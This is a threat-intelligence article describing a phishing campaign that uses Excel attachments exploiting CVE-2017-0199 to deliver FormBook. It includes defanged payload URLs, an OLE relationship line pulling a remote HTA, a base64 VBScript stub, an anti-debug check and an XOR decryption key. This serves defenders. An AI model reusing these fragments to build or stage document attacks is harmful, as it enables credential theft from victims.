Weaponized Excel Files Deliver FormBook Malware to Windows Systems

Cybersecurity researchers at FortiGuard Labs have identified an active, high-severity phishing campaign targeting users of older Microsoft Office versions.

The attackers’ primary vehicle: malicious Excel attachments sent via email, specifically designed to exploit the long-known vulnerability CVE-2017-0199.

This campaign aims to deliver FormBook, an advanced information-stealing malware capable of capturing login credentials, keystrokes, and clipboard data.

The phishing emails are crafted to look like sales orders or other business documents, tricking recipients into opening the attached Excel file.

Once opened on a vulnerable system, the weaponized Excel document leverages Office’s OLE (Object Linking and Embedding) functionality to retrieve a malicious HTA (HTML Application) file from a remote server via HTTP.

How the Exploit Works

Step-by-Step Exploitation:

1. Phishing Email Delivery:
   The campaign begins with an email containing an Excel attachment. The subject line may be flagged as suspicious by some email security solutions, but many may not catch it if the attachment is not already known as malicious.
   • Example Subject: URGENT: Sales Order 12345 [virus detected]
2. Exploiting CVE-2017-0199:
   Upon opening the Excel file in a vulnerable Office version (2007, 2010, 2013, or 2016), the document uses OLE to send an HTTP request to a remote server, fetching an HTA file. This is achieved as follows:xml<Relationship Id="rId8" Type="http://schemas.microsoft.com/office/2006/relationships/oleObject" Target="hxxps[:]//agr[.]my/P6bJNr" TargetMode="External"/>
   • Result: The Office application requests the HTA file from the attacker’s server.
   • Process: When the file is retrieved, the Microsoft HTA application (mshta.exe) is launched to execute the malicious script.
3. HTA File Execution:
   The downloaded HTA file contains base64-encoded content:text<script language="VBScript"> Execute DecodeBase64("...") </script> Upon execution, the script decodes the payload and typically downloads a secondary payload to the %APPDATA% directory.
4. sihost.exe Payload:
   The HTA script downloads and executes a file named sihost.exe. Analysis of this executable reveals it was likely compiled with AutoIt, as evidenced by the magic number in its .rsrc section:textMagic Number: A3 48 4B BE 98 6C 4A A9 99 4C 53 0A 86 D6 48 7D This signature is characteristic of executables generated by Aut2Exe from AutoIt scripts. The sample also employs anti-debugging techniques, such as checking for debuggers using the IsDebuggerPresent API:autoit$IsDebug = DllCall("kernel32.dll", "int", "IsDebuggerPresent") If $IsDebug[0] Then MsgBox(0, "Debugger", "This is a third-party compiled AutoIt script.")
5. Extracting and Decoding springmaker:
   The script within sihost.exe reads and decrypts a resource named SCRIPT from its .rsrc section. A file called springmaker is extracted to the %TEMP% directory. The decryption is performed using an XOR operation with the key 3NQXSHDTVT2DPK06:python# Example Python XOR decryption data = open("springmaker", "rb").read() key = "3NQXSHDTVT2DPK06".encode() decrypted = bytes([(c ^ key[i % len(key)]) for i, c in enumerate(data)]) open("springmaker.decrypted", "wb").write(decrypted)
6. FormBook Deployment:
   The decrypted springmaker file is the core payload, identified as the FormBook malware. Once executed, FormBook establishes persistence, exfiltrates sensitive data, and can receive further commands from its operators.

Implications and Protection Measures

This attack chain highlights the continued threat posed by outdated software and the sophistication of modern malware campaigns. Despite the availability of patches for CVE-2017-0199 since 2017, many organizations remain vulnerable due to patch management challenges.

Indicators of Compromise (IOCs)

• URLs:
  • hxxp[:]//172[.]245[.]123[.]32/xampp/hh/wef[.]hta
  • hxxp[:]//172[.]245[.]123[.]32/199/sihost[.]exe
• Samples (SHA-256):
  • AprilSAO2025.xls: 33A1696D69874AD86501F739A0186F0E4C0301B5A45D73DA903F91539C0DB427
  • wef.hta: 2BFBF6792CA46219259424EFBBBEE09DDBE6AE8FD9426C50AA0326A530AC5B14
  • siHOST.exe: 7E16ED31277C31C0370B391A1FC73F77D7F0CD13CC3BAB0EAA9E2F303B6019AF
  • springmaker (decrypted/FormBook): 3843F96588773E2E463A4DA492C875B3241A4842D0C087A19C948E2BE0898364

Defensive Recommendations

• Update Software: Ensure all Microsoft Office installations are updated to the latest versions.
• Email Security: Deploy advanced email filtering and sandboxing solutions to detect and block malicious attachments.
• Endpoint Protection: Use antivirus and endpoint detection and response (EDR) tools capable of detecting FormBook and similar malware.
• User Awareness: Train employees to recognize phishing attempts and the dangers of opening unexpected attachments.
• Network Monitoring: Monitor for connections to known malicious IPs and domains.

The recent weaponized Excel campaign exploiting CVE-2017-0199 to deliver FormBook malware is a stark reminder of the risks posed by unpatched software and social engineering.

Organizations must remain vigilant, applying patches promptly and educating users to mitigate the risk of such sophisticated attacks.